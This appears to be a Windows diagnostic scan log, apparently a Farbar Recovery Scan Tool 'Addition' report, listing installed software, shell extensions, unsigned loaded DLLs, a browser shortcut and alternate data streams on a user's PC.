Microsoft System CLR Types for SQL Server 2019 CTP2.2 (HKLM\...\{8D7CE3B0-5379-46FE-9F4B-A65D9F4CC1F1}) (Version: 15.0.1200.24 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2019 CTP2.2 (HKLM-x32\...\{725CC962-98BD-42C7-87D8-51C680FB1779}) (Version: 15.0.1200.24 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 2.5.2061.411 - Microsoft Corporation)
Minecraft Launcher (HKLM-x32\...\{E15F69FA-660D-45CC-B28F-6CBC4CAD2091}) (Version: 1.0.0.0 - Mojang)
MSI Development Tools (HKLM-x32\...\{DB4DB790-64DD-1902-4BF2-833B3B6DBCA1}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 7.8.4 - Notepad++ Team)
NVIDIA Graphics Driver 436.15 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 436.15 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.38.21 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.38.21 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.19.0218 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.19.0218 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 23.2.1 - OBS Project)
Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.12624.20442 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.12624.20466 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0409-1000-0000000FF1CE}) (Version: 16.0.12624.20442 - Microsoft Corporation) Hidden
Python 3.6.0 Add to Path (64-bit) (HKLM\...\{5A3CA177-8304-4D59-A44D-6A60032725E4}) (Version: 3.6.150.0 - Python Software Foundation) Hidden
Python 3.6.0 Core Interpreter (64-bit) (HKLM\...\{1944B5D6-0FFB-47C0-BFEC-5C7A2F013FA7}) (Version: 3.6.150.0 - Python Software Foundation) Hidden
Python 3.6.0 Development Libraries (64-bit) (HKLM\...\{A6A3184B-748E-46F4-9E28-6B5889506170}) (Version: 3.6.150.0 - Python Software Foundation) Hidden
Python 3.6.0 Documentation (64-bit) (HKLM\...\{5D83032F-36B5-42E4-A114-D310119C6F51}) (Version: 3.6.150.0 - Python Software Foundation) Hidden
Python 3.6.0 Executables (64-bit) (HKLM\...\{C0016766-8F63-4992-9E6F-ECFB2CB12BA6}) (Version: 3.6.150.0 - Python Software Foundation) Hidden
Python 3.6.0 pip Bootstrap (64-bit) (HKLM\...\{F9C1C892-4908-41F4-900C-7B0DAAF2387B}) (Version: 3.6.150.0 - Python Software Foundation) Hidden
Python 3.6.0 Standard Library (64-bit) (HKLM\...\{F3CB2257-C4C7-4C84-AF63-BADCED1E3273}) (Version: 3.6.150.0 - Python Software Foundation) Hidden
Python 3.6.0 Tcl/Tk Support (64-bit) (HKLM\...\{E24AA157-AD52-42ED-B484-CA5979D4A728}) (Version: 3.6.150.0 - Python Software Foundation) Hidden
Python 3.6.0 Test Suite (64-bit) (HKLM\...\{631C7E77-5832-40D1-9D6D-7B3766D79BDF}) (Version: 3.6.150.0 - Python Software Foundation) Hidden
Python 3.6.0 Utility Scripts (64-bit) (HKLM\...\{FE905DA4-0F23-4F99-9284-50BB4913CEB4}) (Version: 3.6.150.0 - Python Software Foundation) Hidden
Python 3.8.2 Add to Path (32-bit) (HKLM-x32\...\{D09DF89B-E013-43F8-8ED8-6D6B9D4A1CDA}) (Version: 3.8.2150.0 - Python Software Foundation) Hidden
Python 3.8.2 Core Interpreter (32-bit) (HKLM-x32\...\{6BA6203C-85AB-4B9E-8582-CE31B1B5C0ED}) (Version: 3.8.2150.0 - Python Software Foundation) Hidden
Python 3.8.2 Development Libraries (32-bit) (HKLM-x32\...\{12B4F371-ACE2-435B-BCF1-623F36C4E176}) (Version: 3.8.2150.0 - Python Software Foundation) Hidden
Python 3.8.2 Documentation (32-bit) (HKLM-x32\...\{45CEE0C6-5BB2-4A8B-B83C-58559A1CA424}) (Version: 3.8.2150.0 - Python Software Foundation) Hidden
Python 3.8.2 Executables (32-bit) (HKLM-x32\...\{FE5BE50D-21D5-44FB-9A97-5010E68608DA}) (Version: 3.8.2150.0 - Python Software Foundation) Hidden
Python 3.8.2 pip Bootstrap (32-bit) (HKLM-x32\...\{2E818780-AC79-4BC0-8023-C1CC46EAC9B6}) (Version: 3.8.2150.0 - Python Software Foundation) Hidden
Python 3.8.2 Standard Library (32-bit) (HKLM-x32\...\{09CC0C6D-0822-491E-A10E-2A8443DDF170}) (Version: 3.8.2150.0 - Python Software Foundation) Hidden
Python 3.8.2 Tcl/Tk Support (32-bit) (HKLM-x32\...\{B1528EAE-7E64-49DB-8CE1-514EB30BB38B}) (Version: 3.8.2150.0 - Python Software Foundation) Hidden
Python 3.8.2 Test Suite (32-bit) (HKLM-x32\...\{EE21EEE7-9D5A-4ECE-B60F-4BFA63BDA937}) (Version: 3.8.2150.0 - Python Software Foundation) Hidden
Python 3.8.2 Utility Scripts (32-bit) (HKLM-x32\...\{E284B869-7701-4A91-82C2-D3E66974A0F9}) (Version: 3.8.2150.0 - Python Software Foundation) Hidden
Roblox Player for ntbea (HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\roblox-player) (Version:  - Roblox Corporation)
SDK ARM Additions (HKLM-x32\...\{73681F86-CD86-4208-572F-959B45430B04}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
SDK ARM Redistributables (HKLM-x32\...\{67EE3804-9642-62BA-EBF1-B1561FB4ECBE}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Shotcut (HKLM-x32\...\Shotcut) (Version: 19.09.14 - Meltytech, LLC)
Tracktion 7 (HKLM\...\Tracktion 7) (Version: 7.2.1.0 - Tracktion Software Corp.)
Unity (HKLM-x32\...\Unity) (Version: 2018.4.17f1 - Unity Technologies ApS)
Unity Hub 2.2.2 (HKLM\...\Unity Technologies - Hub) (Version: 2.2.2 - Unity Technologies Inc.)
Universal CRT Extension SDK (HKLM-x32\...\{13952D7A-B7B3-F4F8-5F29-5CD18E8168B7}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{74CBC330-ED16-31B9-E8BE-0C6A8E67DE32}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{847D4DAF-0182-265B-324F-406462E8A90D}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Universal CRT Tools x64 (HKLM\...\{54FE4D23-11A2-F1C4-76E9-79C8FB40A4A1}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Universal CRT Tools x86 (HKLM-x32\...\{9F7B0D96-881D-8850-C303-43F3A08E6902}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{6F54BF87-2EE6-FA6D-431D-33A665992D49}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Update for  (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
vcpp_crt.redist.clickonce (HKLM-x32\...\{6B25D94A-4B50-45E2-BBD3-54E68700E1BC}) (Version: 14.25.28508 - Microsoft Corporation) Hidden
Visual Studio Community 2019 (HKLM-x32\...\8cf2634f) (Version: 16.5.30011.22 - Microsoft Corporation)
VS Immersive Activate Helper (HKLM-x32\...\{78500789-0EBE-4490-BE43-F9EF8250BF42}) (Version: 16.0.98.0 - Microsoft Corporation) Hidden
VS JIT Debugger (HKLM\...\{4137D3AB-5B44-4AC9-83A4-5273F2E2547E}) (Version: 16.0.98.0 - Microsoft Corporation) Hidden
VS Script Debugging Common (HKLM\...\{D8B26CBD-15D2-440B-BCBD-5616D74EFC7D}) (Version: 16.0.98.0 - Microsoft Corporation) Hidden
vs_BlendMsi (HKLM-x32\...\{B5E3A3E1-1529-4D5A-9E95-34971FA07825}) (Version: 16.0.28329 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsi (HKLM-x32\...\{BAF91847-0A64-405E-98EC-A0BA6FB4BC4E}) (Version: 16.0.28329 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsires (HKLM-x32\...\{271F1F42-B547-4498-825F-590DBB1774F7}) (Version: 16.0.28329 - Microsoft Corporation) Hidden
vs_clickoncesigntoolmsi (HKLM-x32\...\{30D97A69-3C0F-4552-9A72-60E591B210C7}) (Version: 16.0.28329 - Microsoft Corporation) Hidden
vs_communitymsi (HKLM-x32\...\{FDC38876-AD68-4616-942D-AC3194DAB0A3}) (Version: 16.5.29814 - Microsoft Corporation) Hidden
vs_communitymsires (HKLM-x32\...\{95E79BBC-97FD-4FEB-91B5-CC0231324812}) (Version: 16.0.28329 - Microsoft Corporation) Hidden
vs_devenvmsi (HKLM-x32\...\{AD0C92A4-1514-4BC1-A723-A272A8343924}) (Version: 16.0.28329 - Microsoft Corporation) Hidden
vs_filehandler_amd64 (HKLM-x32\...\{7DB17E2A-450D-4DBD-9C17-545A95804B0C}) (Version: 16.5.29814 - Microsoft Corporation) Hidden
vs_filehandler_x86 (HKLM-x32\...\{C309FC3D-20C2-4F48-AF46-E59674774602}) (Version: 16.5.29814 - Microsoft Corporation) Hidden
vs_FileTracker_Singleton (HKLM-x32\...\{692A0FB3-E6A2-4D41-AC03-4136B4312DC0}) (Version: 16.3.29209 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx64 (HKLM\...\{ABBD10CA-0CFA-4D76-B033-F76C55A54336}) (Version: 16.4.29411 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx86 (HKLM-x32\...\{E47B4703-2337-4ED0-BA24-3EC08D643684}) (Version: 16.4.29411 - Microsoft Corporation) Hidden
vs_minshellinteropmsi (HKLM-x32\...\{27B16914-BC5D-4018-8074-071262A27F6D}) (Version: 16.2.28917 - Microsoft Corporation) Hidden
vs_minshellmsi (HKLM-x32\...\{4D33D909-B071-41D2-B305-96B8586F911E}) (Version: 16.5.29814 - Microsoft Corporation) Hidden
vs_minshellmsires (HKLM-x32\...\{EC04CD66-C03A-470D-B0D2-4BBC87F6382D}) (Version: 16.0.28329 - Microsoft Corporation) Hidden
vs_SQLClickOnceBootstrappermsi (HKLM-x32\...\{0A54CADD-CBA1-4BC9-A134-6C9F91F41B9A}) (Version: 16.5.29521 - Microsoft Corporation) Hidden
vs_tipsmsi (HKLM-x32\...\{E208E682-50EE-4F2F-9860-C91B906B8A03}) (Version: 16.0.28329 - Microsoft Corporation) Hidden
WinAppDeploy (HKLM-x32\...\{8E3AE0EF-D067-700C-BDB4-10D5552155DC}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
Windows SDK AddOn (HKLM-x32\...\{E6F877A1-2F65-4BF0-87B6-A4071B7663D3}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Software Development Kit - Windows 10.0.18362.1 (HKLM-x32\...\{126dedf0-cc0e-4b48-9ece-806b0e437195}) (Version: 10.1.18362.1 - Microsoft Corporation)
WinRAR 5.71 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.71.0 - win.rar GmbH)
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{E67F1F03-FB4A-3D61-8999-E6A4C4B26F34}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{7EF010FF-7800-28BA-FF49-2D219EC7BA82}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{36AE12FB-4349-6EAA-B6E4-5F4E06FA8AE8}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{6B03A6A4-643C-57CE-CA6F-4E19BF47497A}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense Mobile - en-us (HKLM-x32\...\{918A448F-59E8-FBF5-B087-D3F07160C7E0}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{66483041-F590-EC46-4AF0-EE39C62FB680}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{9C61E6D2-C43E-6746-B519-6185558C4A24}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{6B37CC5B-78DF-5050-2215-68479716A587}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{250D5341-0879-4016-399C-BBCD87B80E95}) (Version: 10.1.18362.1 - Microsoft Corporation) Hidden
HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_110.1.728.0_x64__v10z8vjag6ke6 [2020-04-15] (HP Inc.)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-08-28] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-08-28] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.6.4030.0_x64__8wekyb3d8bbwe [2020-04-15] (Microsoft Studios) [MS Ad]
Minecraft for Windows 10 -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.14.6005.0_x64__8wekyb3d8bbwe [2020-04-22] (Microsoft Studios)
MSN Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.36.20714.0_x64__8wekyb3d8bbwe [2020-03-25] (Microsoft Corporation) [MS Ad]
Photos Add-on -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2017.39121.36610.0_x64__8wekyb3d8bbwe [2019-09-07] (Microsoft Corporation)
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-09-07] (Microsoft Corporation)
Pixel Art Studio -> C:\Program Files\WindowsApps\58815Gritsenko.PixelArtStudio_2.26.149.0_x64__7w3b3zxd8ve1p [2019-10-03] (Gritsenko)
ROBLOX -> C:\Program Files\WindowsApps\ROBLOXCORPORATION.ROBLOX_2.428.7790.0_x86__55nm5eh3cm0pr [2020-04-17] (ROBLOX Corporation)
Xbox Insider Hub -> C:\Program Files\WindowsApps\Microsoft.FlightDashboard_469.2003.9001.0_x64__8wekyb3d8bbwe [2020-04-21] (Microsoft Corporation)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-230749707-3925018352-439227168-1001_Classes\CLSID\{19A6E644-14E6-4A60-B8D7-DD20610A871D}\InprocServer32 -> C:\Users\ntbea\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20031.2\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-230749707-3925018352-439227168-1001_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\ntbea\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20031.2\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL -> No File
ShellIconOverlayIdentifiers: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL -> No File
ShellIconOverlayIdentifiers: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL -> No File
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files\Notepad++\NppShell_06.dll [2020-01-29] (Notepad++ -> )
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2020-03-17] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2019-08-24] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
==================== Codecs (Whitelisted) ====================
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\ntbea\Desktop\The3EyedGamer - (The3EyedGamer - Exploits) - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Profile 6"
==================== Loaded Modules (Whitelisted) =============
2019-08-27 17:12 - 2019-08-27 17:12 - 000237568 _____ () [File not signed] C:\Program Files (x86)\MSI\Dragon Center\Mystic_Light\LEDControl.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000017920 _____ () [File not signed] C:\Program Files\AMD\CNext\CNext\libEGL.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 003567616 _____ () [File not signed] C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2018-03-13 04:47 - 2018-03-13 04:47 - 000912896 _____ () [File not signed] C:\Program Files\AMD\Performance Profile Client\aws-cpp-sdk-core.dll
2018-03-13 04:47 - 2018-03-13 04:47 - 003109888 _____ () [File not signed] C:\Program Files\AMD\Performance Profile Client\aws-cpp-sdk-s3.dll
2015-02-19 01:13 - 2015-02-19 01:13 - 000817152 _____ () [File not signed] C:\Program Files\AMD\Performance Profile Client\Device.dll
2015-02-19 01:13 - 2015-02-19 01:13 - 003650560 _____ () [File not signed] C:\Program Files\AMD\Performance Profile Client\Platform.dll
2019-06-19 13:25 - 2019-06-19 13:25 - 000209920 _____ () [File not signed] C:\Program Files\ENE\Aac_ENE RGB HAL\x86\AacHal_x86.dll
2018-03-20 17:34 - 2018-03-20 17:34 - 000265728 _____ () [File not signed] C:\Program Files\ENE\Aac_ENE RGB HAL\x86\SB_SMBUS_SDK.dll
2019-06-12 18:42 - 2019-06-12 18:42 - 000195584 _____ () [File not signed] C:\Program Files\ENE\Aac_ENE_EHD_HAL\AacHal_x86.dll
2020-03-17 17:01 - 2020-03-17 17:01 - 001518592 _____ (Advanced Micro Devices, Inc.) [File not signed] C:\Program Files\AMD\WVR\OpenVR\bin\win64\driver_amdwvr.dll
2019-05-23 18:48 - 2019-05-23 18:48 - 000471040 _____ (asmedia) [File not signed] C:\Program Files\ENE\Aac_ENE_EHD_HAL\asmtusb.dll
2019-08-27 17:10 - 2018-04-25 21:30 - 000240128 _____ (A-Volute) [File not signed] C:\Program Files (x86)\MSI\Dragon Center\Nahimic\NahimicAPI.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000031744 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qgif.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000039424 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qicns.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000031744 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qico.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000413696 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qjpeg.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000025088 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qsvg.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000025088 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qtga.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000023552 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qwbmp.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000519168 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qwebp.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 001431040 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\platforms\qwindows.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 001180672 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\sqldrivers\qsqlite.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000135680 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\plugins\styles\qwindowsvistastyle.dll
2020-03-17 17:10 - 2020-03-17 17:10 - 006010880 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Core.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 006345216 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Gui.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 001078272 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Network.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000313856 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Positioning.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 004000256 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Qml.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 003802624 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Quick.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000171008 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5QuickControls2.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 001083904 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5QuickTemplates2.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000205312 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Sql.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000329728 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Svg.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000113152 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WebChannel.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000376320 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WebEngine.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 092323328 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WebEngineCore.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 005560832 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Widgets.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000463360 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WinExtras.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000188416 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Xml.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 002888704 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5XmlPatterns.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000053760 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtGraphicalEffects\private\qtgraphicaleffectsprivate.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000059392 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtGraphicalEffects\qtgraphicaleffectsplugin.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000017408 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000287232 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Controls.2\qtquickcontrols2plugin.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000329216 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000136192 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000089088 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000312320 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Templates.2\qtquicktemplates2plugin.dll
2019-07-18 12:11 - 2019-07-18 12:11 - 000017920 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2020-03-17 17:10 - 2020-03-17 17:10 - 000085504 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\AMD\CNext\CNext\QtWebEngine\qtwebengineplugin.dll
2019-08-27 17:12 - 2019-08-27 17:12 - 000399872 _____ (TODO: <公司名稱>) [File not signed] C:\Program Files (x86)\MSI\Dragon Center\Mystic_Light\Lib\SDKDLL.dll
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Windows\system32\Drivers\fowjmaln.sys:changelist [348]
AlternateDataStreams: C:\Users\ntbea\ntuser.ini:NTV [12836]
